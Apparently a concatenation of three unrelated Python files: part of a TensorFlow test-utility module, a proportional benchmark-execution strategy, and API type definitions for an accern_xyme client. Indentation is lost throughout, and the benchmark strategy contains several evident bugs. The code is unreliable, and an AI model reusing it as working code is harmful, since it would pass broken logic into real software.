ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts. `a` and `b` can be namedtuples too,
which are converted to dicts.
Args:
a: The expected numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
|
ProportionalExecutionStrategy.py
|
# -*- coding: utf-8 -*-
import random
import datetime
import threading
from ..config.MeasurementType import MeasurementType
from ..config.ConfigurationManager import ConfigurationManager
from ..results.ResultsManager import ResultsManager
from .ExecutionContext import ExecutionContext
from ..benchmarks.BenchmarkInstance import BenchmarkInstance
from ..benchmarks.BenchmarkSuiteInstance import BenchmarkSuiteInstance
from ..results.BenchmarkResult import BenchmarkResult
from .ExecutionContext import ExecutionContext
from .ExecutionStrategy import ExecutionStrategy
from .ResultAggregator import ResultAggregator
class ProportionalExecutionStrategy(ExecutionStrategy):
def __init__(self, configuration, results,
execution, benchmarks):
super().__init__(configuration, results, execution, benchmarks)
self.__running = False
self.__aggregation = None
self.__ticks_per_transaction = 0
self.__last_executed_time = None
self.__stop_time = None
self.__benchmark_count = None
self.__only_benchmark = None
self.__timeout = None
self.__aggregation = ResultAggregator(results, benchmarks)
def start(self, callback=None):
if self.__running:
callback(None)
return
self.__running = True
self.__aggregation.start()
self.__calculate_proportional_ranges()
if self._configuration.measurement_type == MeasurementType.Nominal:
self.__ticks_per_transaction = 1000.0 / self._configuration.nominal_rate
# Initialize and start
def inner(_suite, _callback):
try:
_context = ExecutionContext(_suite, self.__aggregation, self)
self._suites.__sui.set_up(_context, _callback)
# Execute benchmarks
self.__execute(_callback)
except Exception as err:
# Abort if initialization failed
self.__aggregation.report_error(err)
_callback(err)
return
for suite in self._suites:
threading.Thread(
target=inner, args=(suite, callback)
).start()
@property
def is_stopped(self):
return not self.__running
def stop(self, callback=None):
# Interrupt any wait
if self.__timeout is not None:
self.__timeout.do_run = False
self.__timeout = None
if self.__running:
self.__running = False
self.__aggregation.stop()
if self._execution:
self._execution.stop()
# Stop and cleanup execution
def inner(_suite, _callback):
try:
_suite.tear_down(_callback)
except Exception as err:
if _callback:
_callback(err)
for suite in self._suites:
threading.Thread(
target=inner, args=(suite, callback)
).start()
else:
if callback:
callback(None)
def __calculate_proportional_ranges(self):
total_proportion = 0
for benchmark in self._active_benchmarks:
total_proportion += benchmark.proportion
start_range = 0
for benchmark in self._active_benchmarks:
normalized_proportion = benchmark.proportion / total_proportion
benchmark.start_range = start_range
benchmark.end_range = start_range + normalized_proportion
start_range += normalized_proportion
def __choose_benchmark_proportionally(self):
proportion = random.random()
return filter(lambda benchmark: benchmark.with_range(proportion), self._active_benchmarks)
def __execute_delay(self, delay, callback):
def inner():
self.__timeout = None
self.__last_executed_time = datetime.datetime.now()
callback(None)
self.__timeout = threading.Timer(delay, inner)
self.__timeout.start()
def __execute_benchmark(self, benchmark, callback):
try:
if benchmark is None or benchmark.is_passive:
# Delay if benchmarks are passive
self.__execute_delay(500, callback)
else:
# Execute active benchmark
def inner(_err=None):
# Process force continue
if _err and self._configuration.force_continue:
self.__aggregation.report_error(_err)
_err = None
# Increment counter
now = datetime.datetime.now()
if _err is None:
self.__aggregation.increment_counter(1, now)
# Introduce delay to keep nominal rate
if _err is None and self._configuration.measurement_type == MeasurementType.Nominal:
delay = self.__ticks_per_transaction - (
1000 * (now.timestamp() - self.__last_executed_time.timestamp()))
self.__last_executed_time = now
if delay > 0:
self.__execute_delay(delay, callback)
else:
callback(_err)
else:
self.__last_executed_time = now
callback(_err)
benchmark.execute(inner)
except Exception as err:
# Process force continue
if self._configuration.force_continue:
self.__aggregation.report_error(err)
callback(None)
else:
callback(err)
def __execute(self, callback=None):
self.__last_executed_time = datetime.datetime.now()
duration = self._configuration.duration if self._configuration.duration > 0 else 365 * 24 * 36000
self.__stop_time = datetime.datetime.now().timestamp() * 1000 + duration * 1000
self.__benchmark_count = len(self._benchmarks)
self.__only_benchmark = self._benchmarks[0] if self.__benchmark_count == 1 else None
# Execute benchmarks
def inner():
benchmark = self.__only_benchmark if self.__only_benchmark is not None \
else self.__choose_benchmark_proportionally()
called = 0
try:
def _callback(_err):
thread = threading.Thread(target=callback, args=_err)
thread.start()
thread.join()
self.__execute_benchmark(benchmark, _callback)
except Exception as err:
self.stop(lambda err2: callback(err))
while self.__running and self.__last_executed_time.timestamp() < self.__stop_time:
inner()
self.stop(None)
|
legacy.py
|
from typing import (
Any,
cast,
Dict,
IO,
Iterable,
Iterator,
List,
Optional,
Set,
Tuple,
Union,
)
import io
import os
import sys
import copy
import json
import time
import threading
import contextlib
import collections
from io import BytesIO
import requests
import pandas as pd
from typing_extensions import TypedDict, Literal, overload
import quick_server
from accern_xyme.v2.util import (
get_file_upload_chunk_size,
get_max_retry,
get_retry_sleep,
maybe_timestamp,
df_to_csv,
setup_matplotlib,
get_progress_bar,
get_file_hash,
)
API_VERSION = 2
METHOD_DELETE = "DELETE"
METHOD_FILE = "FILE"
METHOD_GET = "GET"
METHOD_LONGPOST = "LONGPOST"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
PREFIX = "/xyme"
SOURCE_TYPE_MULTI = "multi"
SOURCE_TYPE_CSV = "csv"
SOURCE_TYPE_IO = "io"
SOURCE_TYPE_PRICES = "prices"
SOURCE_TYPE_USER = "user"
ALL_SOURCE_TYPES = [
SOURCE_TYPE_MULTI,
SOURCE_TYPE_CSV,
SOURCE_TYPE_IO,
SOURCE_TYPE_PRICES,
SOURCE_TYPE_USER,
]
INPUT_CSV_EXT = ".csv"
INPUT_TSV_EXT = ".tsv"
INPUT_ZIP_EXT = ".zip"
INPUT_EXT = [INPUT_ZIP_EXT, INPUT_CSV_EXT, INPUT_TSV_EXT]
UPLOAD_IN_PROGRESS = "in_progress"
UPLOAD_DONE = "done"
UPLOAD_START = "start"
FILTER_SYSTEM = "system"
FILTER_USER = "user"
FILTERS = [FILTER_SYSTEM, FILTER_USER]
PLOT_PKL = "pkl"
PLOT_CSV = "csv"
PLOT_OUTPUT = "output"
PLOT_META = "meta"
PRED_LATEST = "latest" # using the current snapshot of the model
PRED_HISTORIC = "historic" # using the historic data
PRED_PREDICTED = "predicted" # using csv
PRED_PROBA = "proba_outcome" # using historic probabilities
# using filtered historic probabilities
PRED_PROBA_FILTERED = "proba_outcome_filter"
PRED_PROBS = "probs" # using historic probabilities
PRED_VALID = "validation" # using validation data
VersionInfo = TypedDict('VersionInfo', {
"apiVersion": Union[str, int],
"callerApiVersion": str,
"time": str,
"version": str,
"xymeVersion": str,
})
UserLogin = TypedDict('UserLogin', {
"token": str,
"success": bool,
"permissions": List[str],
})
UserInfo = TypedDict('UserInfo', {
"company": str,
"hasLogout": bool,
"path": str,
"username": str,
})
MaintenanceInfo = TypedDict('MaintenanceInfo', {
"isAfterupdate": bool,
"isMaintenance": bool,
"queuedMaintenance": bool,
})
HintedMaintenanceInfo = TypedDict('HintedMaintenanceInfo', {
"isAfterupdate": bool,
"isMaintenance": bool,
"pollHint": float,
"queuedMaintenance": bool,
})
JobCreateResponse = TypedDict('JobCreateResponse', {
"jobId": str,
"name": str,
"path": str,
"schema": str,
})
JobBackupResponse = TypedDict('JobBackupResponse', {
"jobId": str,
})
SchemaResponse = TypedDict('SchemaResponse', {
"schema": str,
})
SourceResponse = TypedDict('SourceResponse', {
"sourceId": str,
})
JobStartResponse = TypedDict('JobStartResponse', {
"job": Optional[str],
"exit": Optional[int],
"stdout": Optional[List[str]],
})
JobRenameResponse = TypedDict('JobRenameResponse', {
"name": str,
"path": str,
})
JobPauseResponse = TypedDict('JobPauseResponse', {
"success": bool,
})
JobStatusInfo = TypedDict('JobStatusInfo', {
"allKinds": List[str],
"allTabs": List[str],
"buttons": List[str],
"empty": bool,
"isUserJob": bool,
"name": str,
"path": str,
"plotOrderTypes": List[str],
"pollHint": float,
"schema": str,
"status": str,
"tickers": List[str],
"timeTotal": float,
"timeStart": Optional[str],
"timeEnd": Optional[str],
"timeEstimate": Optional[str],
"canRename": bool,
"permalink": str,
"symjob": bool,
})
JobListItemInfo = TypedDict('JobListItemInfo', {
"deployTime": str,
"jobId": str,
"name": str,
"path": str,
"kinds": List[str],
"timeTotal": float,
"timeStart": Optional[str],
"timeEnd": Optional[str],
"timeEstimate": Optional[str],
"status": str,
"canDelete": bool,
"canPause": bool,
"canUnpause": bool,
"permalink": str,
})
JobListResponse = TypedDict('JobListResponse', {
"jobs": Dict[str, List[JobListItemInfo]],
"counts": Dict[str, int],
"allKinds": List[str],
"allStatus": List[str],
"pollHint": float,
"isReadAdmin": bool,
})
StdoutMarker = int
StdoutLine = Tuple[StdoutMarker, str]
StdoutResponse = TypedDict('StdoutResponse', {
"lines": List[StdoutLine],
"messages": Dict[str, List[Tuple[str, List[StdoutLine]]]],
"exceptions": List[Tuple[str, List[StdoutLine]]],
})
PredictionsResponse = TypedDict('PredictionsResponse', {
"columns": List[str],
"dtypes": List[str],
"values": List[List[Union[str, float, int]]],
})
Approximate = TypedDict('Approximate', {
"mean": float,
"stddev": float,
"q_low": float,
"q_high": float,
"vmin": float,
"vmax": float,
"count": int,
})
ApproximateImportance = TypedDict('ApproximateImportance', {
"name": str,
"importance": Approximate,
})
ApproximateUserExplanation = TypedDict('ApproximateUserExplanation', {
"label": Union[str, int],
"weights": List[ApproximateImportance],
})
DynamicPredictionResponse = TypedDict('DynamicPredictionResponse', {
"predictions": Optional[PredictionsResponse],
"explanations": Optional[List[ApproximateUserExplanation]],
"stdout": StdoutResponse,
})
ShareList = TypedDict('ShareList', {
"shareable": List[Tuple[str, str]],
})
ShareablePath = TypedDict('ShareablePath', {
"name": str,
"path": str,
})
ShareResponse = TypedDict('ShareResponse', {
"job": str,
})
CreateSourceResponse = TypedDict('CreateSourceResponse', {
"multiSourceId": str,
"sourceId": str,
"jobSchema": Optional[str],
})
CreateSource = TypedDict('CreateSource', {
"source": 'SourceHandle',
"multi_source": 'SourceHandle',
})
CreateInputResponse = TypedDict('CreateInputResponse', {
"inputId": str,
})
LockSourceResponse = TypedDict('LockSourceResponse', {
"newSourceId": str,
"immutable": bool,
"jobSchema": Optional[str],
"multiSourceId": Optional[str],
"sourceSchemaMap": Dict[str, Dict[str, Any]],
})
LockSource = TypedDict('LockSource', {
"new_source": 'SourceHandle',
"immutable": bool,
"multi_source": Optional['SourceHandle'],
"source_schema_map": Dict[str, Dict[str, Any]],
})
SourceInfoResponse = TypedDict('SourceInfoResponse', {
"dirty": bool,
"immutable": bool,
"sourceName": Optional[str],
"sourceType": Optional[str],
})
SourceSchemaResponse = TypedDict('SourceSchemaResponse', {
"sourceSchema": Dict[str, Any],
"sourceInfo": SourceInfoResponse,
"pollHint": float,
})
SystemLogResponse = TypedDict('SystemLogResponse', {
"logs": Optional[List[StdoutLine]],
})
SourceItem = TypedDict('SourceItem', {
"id": str,
"name": str,
"type": Optional[str],
"help": str,
"immutable": bool,
})
SourcesResponse = TypedDict('SourcesResponse', {
"systemSources": List[SourceItem],
"userSources": List[SourceItem],
})
InspectQuery = Optional[Dict[str, Any]]
InspectItem = TypedDict('InspectItem', {
"clazz": str,
"leaf": bool,
"value": Union[None, str, List[Any]],
"extra": str,
"collapsed": bool,
})
InspectResponse = TypedDict('InspectResponse', {
"inspect": InspectItem,
"pollHint": float,
})
RedisQueueSizes = TypedDict('RedisQueueSizes', {
"wait": int,
"regular": int,
"busy": int,
"result": int,
"failed": int,
"paused": int,
})
JobsOverview = TypedDict('JobsOverview', {
"current": Dict[str, Dict[str, int]],
"queues": RedisQueueSizes,
